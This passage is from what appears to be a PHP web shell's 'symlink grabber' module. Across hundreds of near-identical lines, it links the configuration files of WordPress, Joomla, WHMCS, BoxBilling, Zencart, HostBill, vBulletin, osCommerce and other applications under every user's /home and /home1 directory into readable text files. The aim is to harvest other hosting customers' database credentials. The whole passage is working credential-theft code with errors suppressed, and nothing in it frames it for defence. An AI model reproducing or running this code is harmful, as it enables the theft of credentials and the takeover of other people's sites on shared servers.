  742. @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  743. @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  744. @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  745. @symlink('/home/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  746. @symlink('/home/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  747. @symlink('/home/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  748. @symlink('/home/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  749. @symlink('/home/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  750. @symlink('/home/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  751. @symlink('/home/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  752. @symlink('/home/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  753. @symlink('/home/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  754. @symlink('/home/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  755. @symlink('/home/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  756. @symlink('/home/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  757. @symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  758. @symlink('/home/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  759. @symlink('/home/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  760. @symlink('/home/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  761. @symlink('/home/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  762. @symlink('/home/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  763. @symlink('/home/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  764. @symlink('/home/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  765. @symlink('/home/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  766. @symlink('/home/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  767. @symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  768. @symlink('/home/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  769. @symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  770. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  771. @symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  772. @symlink('/home/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  773. @symlink('/home/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  774. @symlink('/home/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  775. @symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  776. @symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  777. @symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  778. @symlink('/home/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  779. @symlink('/home/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  780. @symlink('/home/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  781. @symlink('/home/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  782. @symlink('/home/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  783. @symlink('/home/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  784. @symlink('/home/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  785. @symlink('/home/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  786. @symlink('/home/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  787. @symlink('/home/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  788. @symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  789. @symlink('/home/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  790. @symlink('/home/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  791. @symlink('/home/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  792. @symlink('/home/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  793. @symlink('/home/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  794. @symlink('/home/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  795. @symlink('/home/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  796. @symlink('/home/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  797. @symlink('/home/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  798. @symlink('/home/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  799. @symlink('/home/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  800. @symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  801. @symlink('/home/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  802. @symlink('/home/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  803. @symlink('/home/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  804. @symlink('/home/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  805. @symlink('/home/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  806. @symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  807. @symlink('/home/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  808. @symlink('/home/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  809. @symlink('/home/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  810. @symlink('/home/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  811. @symlink('/home/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  812. @symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  813. @symlink('/home/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  814. @symlink('/home/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  815. @symlink('/home/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  816. @symlink('/home/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  817. @symlink('/home/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  818. @symlink('/home/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  819. @symlink('/home/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  820. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  821. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  822. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  823. @symlink('/home/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  824. @symlink('/home/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  825. @symlink('/home/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  826. @symlink('/home/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  827. @symlink('/home/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  828. @symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  829. @symlink('/home/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  830. @symlink('/home/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  831. @symlink('/home/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  832. @symlink('/home/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  833. @symlink('/home/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  834. @symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  835. @symlink('/home/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  836. @symlink('/home/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  837. @symlink('/home/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  838. @symlink('/home/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  839. @symlink('/home/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  840. @symlink('/home/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  841. @symlink('/home/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  842. @symlink('/home/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  843. @symlink('/home/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  844. @symlink('/home/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  845. @symlink('/home/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  846. @symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  847. @symlink('/home/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  848. @symlink('/home/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  849. @symlink('/home/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  850. @symlink('/home/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  851. @symlink('/home/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  852. @symlink('/home/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  853. @symlink('/home/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  854. @symlink('/home/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  855. @symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  856. @symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  857. @symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  858. @symlink('/home/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  859. @symlink('/home/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  860. @symlink('/home/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  861. @symlink('/home/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  862. @symlink('/home/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  863. @symlink('/home/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  864. @symlink('/home/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  865. @symlink('/home/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  866. @symlink('/home/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  867. @symlink('/home/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  868. @symlink('/home/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  869. @symlink('/home/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  870. @symlink('/home/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  871. @symlink('/home/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  872. @symlink('/home/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  873. @symlink('/home/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  874. @symlink('/home/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  875. @symlink('/home/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  876. @symlink('/home/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  877. @symlink('/home/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  878. @symlink('/home/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  879. @symlink('/home/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  880. @symlink('/home/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  881. @symlink('/home/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  882. @symlink('/home/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  883. @symlink('/home/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  884. @symlink('/home/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  885. @symlink('/home/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  886. @symlink('/home/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  887. @symlink('/home/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  888. @symlink('/home/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  889. @symlink('/home/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  890. @symlink('/home/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  891. @symlink('/home/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  892. @symlink('/home/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  893. @symlink('/home/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  894. @symlink('/home/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  895. @symlink('/home/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  896. @symlink('/home/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  897. @symlink('/home/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  898. @symlink('/home/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  899. @symlink('/home/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  900. @symlink('/home/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  901.  
  902. //Home1
  903.  
  904. @symlink('/home1/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  905. @symlink('/home1/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  906. @symlink('/home1/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  907. @symlink('/home1/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  908. @symlink('/home1/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  909. @symlink('/home1/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  910. @symlink('/home1/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  911. @symlink('/home1/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  912. @symlink('/home1/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  913. @symlink('/home1/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  914. @symlink('/home1/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  915. @symlink('/home1/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  916. @symlink('/home1/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  917. @symlink('/home1/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  918. @symlink('/home1/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  919. @symlink('/home1/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  920. @symlink('/home1/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  921. @symlink('/home1/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  922. @symlink('/home1/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  923. @symlink('/home1/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  924. @symlink('/home1/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  925. @symlink('/home1/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  926. @symlink('/home1/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  927. @symlink('/home1/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  928. @symlink('/home1/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  929. @symlink('/home1/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  930. @symlink('/home1/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  931. @symlink('/home1/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  932. @symlink('/home1/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  933. @symlink('/home1/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  934. @symlink('/home1/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  935. @symlink('/home1/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  936. @symlink('/home1/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  937. @symlink('/home1/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  938. @symlink('/home1/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  939. @symlink('/home1/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  940. @symlink('/home1/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  941. @symlink('/home1/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  942. @symlink('/home1/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  943. @symlink('/home1/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  944. @symlink('/home1/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  945. @symlink('/home1/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  946. @symlink('/home1/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  947. @symlink('/home1/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  948. @symlink('/home1/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  949. @symlink('/home1/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  950. @symlink('/home1/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  951. @symlink('/home1/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  952. @symlink('/home1/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  953. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  954. @symlink('/home1/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  955. @symlink('/home1/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  956. @symlink('/home1/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  957. @symlink('/home1/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  958. @symlink('/home1/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  959. @symlink('/home1/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  960. @symlink('/home1/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  961. @symlink('/home1/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  962. @symlink('/home1/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  963. @symlink('/home1/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  964. @symlink('/home1/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  965. @symlink('/home1/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  966. @symlink('/home1/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  967. @symlink('/home1/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  968. @symlink('/home1/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  969. @symlink('/home1/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  970. @symlink('/home1/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  971. @symlink('/home1/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  972. @symlink('/home1/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  973. @symlink('/home1/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  974. @symlink('/home1/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  975. @symlink('/home1/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  976. @symlink('/home1/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  977. @symlink('/home1/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  978. @symlink('/home1/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  979. @symlink('/home1/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  980. @symlink('/home1/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  981. @symlink('/home1/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  982. @symlink('/home1/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  983. @symlink('/home1/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  984. @symlink('/home1/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  985. @symlink('/home1/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  986. @symlink('/home1/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  987. @symlink('/home1/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  988. @symlink('/home1/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  989. @symlink('/home1/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  990. @symlink('/home1/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  991. @symlink('/home1/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  992. @symlink('/home1/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  993. @symlink('/home1/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  994. @symlink('/home1/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  995. @symlink('/home1/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  996. @symlink('/home1/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  997. @symlink('/home1/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  998. @symlink('/home1/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  999. @symlink('/home1/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  1000. @symlink('/home1/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  1001. @symlink('/home1/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  1002. @symlink('/home1/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  1003. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1004. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1005. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1006. @symlink('/home1/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  1007. @symlink('/home1/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  1008. @symlink('/home1/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  1009. @symlink('/home1/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  1010. @symlink('/home1/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  1011. @symlink('/home1/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  1012. @symlink('/home1/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  1013. @symlink('/home1/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  1014. @symlink('/home1/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  1015. @symlink('/home1/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  1016. @symlink('/home1/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  1017. @symlink('/home1/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  1018. @symlink('/home1/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  1019. @symlink('/home1/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  1020. @symlink('/home1/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  1021. @symlink('/home1/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  1022. @symlink('/home1/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  1023. @symlink('/home1/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  1024. @symlink('/home1/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  1025. @symlink('/home1/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  1026. @symlink('/home1/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  1027. @symlink('/home1/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  1028. @symlink('/home1/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  1029. @symlink('/home1/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  1030. @symlink('/home1/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  1031. @symlink('/home1/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  1032. @symlink('/home1/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  1033. @symlink('/home1/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  1034. @symlink('/home1/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  1035. @symlink('/home1/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  1036. @symlink('/home1/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  1037. @symlink('/home1/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  1038. @symlink('/home1/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  1039. @symlink('/home1/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  1040. @symlink('/home1/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  1041. @symlink('/home1/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  1042. @symlink('/home1/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  1043. @symlink('/home1/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  1044. @symlink('/home1/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  1045. @symlink('/home1/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  1046. @symlink('/home1/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  1047. @symlink('/home1/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  1048. @symlink('/home1/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  1049. @symlink('/home1/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  1050. @symlink('/home1/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  1051. @symlink('/home1/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  1052. @symlink('/home1/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  1053. @symlink('/home1/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  1054. @symlink('/home1/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  1055. @symlink('/home1/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  1056. @symlink('/home1/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
